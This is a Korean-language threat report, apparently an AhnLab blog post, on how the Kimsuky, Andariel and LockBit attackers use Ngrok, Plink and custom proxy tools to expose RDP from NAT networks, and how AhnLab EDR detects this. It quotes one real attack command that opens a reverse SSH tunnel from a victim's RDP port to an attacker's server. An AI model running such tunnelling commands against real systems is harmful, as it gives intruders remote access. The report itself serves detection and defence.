AhnLab EDR을 활용한 Proxy 도구 탐지

공격자들은 감염 시스템에 대한 제어를 획득한 이후에도 RDP를 이용해 원격에서 화면 제어를 수행하기도 한다. 이는 편리함 때문이기도 하지만 지속성 유지 목적일 수도 있다. 이에 따라 공격 과정에서는 RDP 서비스가 활성화되어 있지 않은 경우에는 RDP Wrapper를 설치하기도 하며 기존 계정의 자격 증명 정보를 탈취하거나 새로운 백도어 계정을 추가하기도 한다.

하지만 감염 시스템이 사설 네트워크 즉 NAT 환경 내부에 존재할 경우에는 IP 및 계정 정보를 알고 있다고 하더라도 외부에서 원격 데스크톱을 이용한 접속이 불가하다. 이에 따라 공격자들은 시스템을 외부에 노출시켜 주는 기능을 담당하는 Proxy 도구들을 추가적으로 설치하기도 한다.

자주 사용되는 도구들로는 Ngrok와 Plink 등이 있으며 이외에도 공격자가 직접 제작하는 경우도 존재한다. Kimsuky 그룹이나 Andariel 그룹은 공격 과정에서 자체 제작한 Proxy 도구들을 활용해 외부에서 원격 데스크톱을 이용하여 감염 시스템들을 제어하고 있다. 여기에서는 실제 공격 과정에서 사용된 Proxy 도구들과 AhnLab EDR을 활용해 이를 탐지하는 방식을 다룬다.

AhnLab EDR (Endpoint Detection and Response)은 국내 유일의 행위 기반 분석 엔진을 기반으로 엔드포인트 영역에 대해 강력한 위협 모니터링과 분석, 대응 역량을 제공하는 차세대 엔드포인트 위협 탐지 및 대응 솔루션이다. AhnLab EDR은 의심스러운 행위에 관한 유형별 정보를 상시 수집해 탐지 및 분석, 대응 관점에서 사용자가 위협을 정확하게 인식할 수 있는 기능을 제공하며 이를 통해 종합적인 분석을 통해 원인 파악과 적절한 대응, 재발 방지 프로세스를 수립할 수 있다.

Figure 1. AhnLab EDR 제품

 

1. Ngrok

Ngrok는 터널링 도구로서 외부에서 NAT 환경 내부에 존재하는 시스템에 접속할 수 있게 노출시켜 주는 도구이다. 주로 Kimsuky 그룹이 과거에 자주 사용하였지만 Andariel 그룹이 사용하거나 여러 공격자들이 이를 활용하고 있다. 공격 사례에서 확인된 명령들을 보면 3389번 포트 즉 RDP 서비스를 외부에 노출시키기 위한 목적이 대부분이다. [1] [2]

Figure 2. 공격에 사용된 Ngrok

Ngrok의 실행 행위는 AhnLab EDR에서 위협으로 식별되어 관리자가 이를 신속히 확인하고 조치를 취할 수 있도록 돕는다.

Figure 3. AhnLab EDR을 활용한 Ngrok 실행 행위 탐지

 

2. Plink

Plink는 PuTTY 도구 모음의 일부로서 SSH(Secure Shell) 클라이언트이다. 주로 명령 줄 기반으로 작동하며 원격 서버에 SSH 연결을 설정하거나 포트 포워딩을 수행하는 데 사용된다. 비록 정상적인 목적으로 사용되는 경우가 많은 도구이지만 Proxy 기능을 지원한다는 점 때문에 다양한 APT 그룹 및 랜섬웨어 공격자들에 의해 악용되고 있다.

과거 LockBit 3.0을 설치한 랜섬웨어 공격자는 Exchange Server 취약점을 공격해 최초 침투한 이후 설치한 웹쉘을 이용해 생성한 스크립트로 RDP를 활성화하고 Plink를 설치하였다. 이후 다음과 같은 명령으로 Plink를 실행하여 공격자의 SSH 서버와 SSH 터널링을 통해 외부에서 RDP 연결이 가능케 하였다.

명령
C:\Temp\AUtempR\p64.exe [제거]@172.93.181[.]238 -pw [제거] -P 443 -2 -4 -T -N -C -R 0.0.0.0:10443:127.0.0.1:3389

Table 1. 공격에서 사용된 명령

AhnLab EDR은 Plink가 동작할 경우 주요 행위로 탐지하며 관리자가 이를 조기에 탐지하고 대응할 수 있도록 한다.

Figure 4. AhnLab EDR을 활용한 Plink 실행 행위 탐지

 

3. 기타 Proxy 도구들

공격자들은 알려진 Proxy 도구들을 활용하기도 하지만 자체적으로 제작하는 경우도 많다. 예를 들어 Andariel 그룹이나 [3] [4] Kimsuky 그룹은 [5] [6] [7] 공격 사례들마다 Proxy 도구들이 새롭게 확인되기도 한다. 다음은 Andariel 그룹의 공격 사례에서 확인된 Proxy 도구로서 2021년 Lazarus 그룹이 사용한 것과 동일하다.

Figure 5. Andariel 그룹이 사용한 Proxy 도구

Proxy 도구들을 실행한 명령들을 보면 공격자들은 주로 RDP 서비스를 외부에 노출시키기 위해 Proxy를 사용한다. 몇몇 Proxy 도구들 중에는 3389번 포트가 하드코딩되어 있기도 하며 다음과 같이 인자로 전달할 수 있지만 기본 설정 포트 번호가 3389번인 경우도 있다.

Figure 6. Kimsuky 그룹의 Proxy 도구

AhnLab EDR은 의심스러운 Proxy 도구가 RDP 서비스를 외부에 노출하는 행위를 위협으로 탐지하며 관리자가 이를 조기에 탐지하고 대응할 수 있도록 한다.

Figure 7. AhnLab EDR을 활용한 의심스러운 Proxy 도구 탐지

 

4. 결론

최근 RDP 즉 원격 데스크톱을 이용해 감염 시스템을 제어하는 사례가 늘어나고 있다. RDP는 최초 침투 과정에서도 주요한 공격 벡터 중 하나이지만 감염 이후 지속성을 유지하거나 원격 화면 제어를 위해 활용되기도 한다. 하지만 감염 시스템이 NAT 환경에 존재할 경우 공격자는 외부에서 RDP 접근에 한계가 존재한다. 이에 따라 공격자들은 알려진 Proxy 도구들을 이용하거나 자체 제작한 도구들을 활용해 RDP 서비스를 외부에 노출시키고 있다.

AhnLab EDR은 조직에 Proxy로 사용될 수 있는 도구가 설치되거나 실행되는 행위에 관한 정보를 수집해 보여줌으로써 관리자가 의심스러운 행위를 인지하고 대응할 수 있도록 한다. 또한 의심스러운 Proxy 도구들이 설치된 경우 이를 위협으로 탐지하여 관리자가 원인을 파악하고 적절한 대응 및 재발 방지 프로세스를 수립할 수 있도록 도와준다.

 

행위 진단
– Execution/EDR.Ngrok.M11445
– Execution/EDR.Proxy.M12243
– Execution/DETECT.Plink.M12255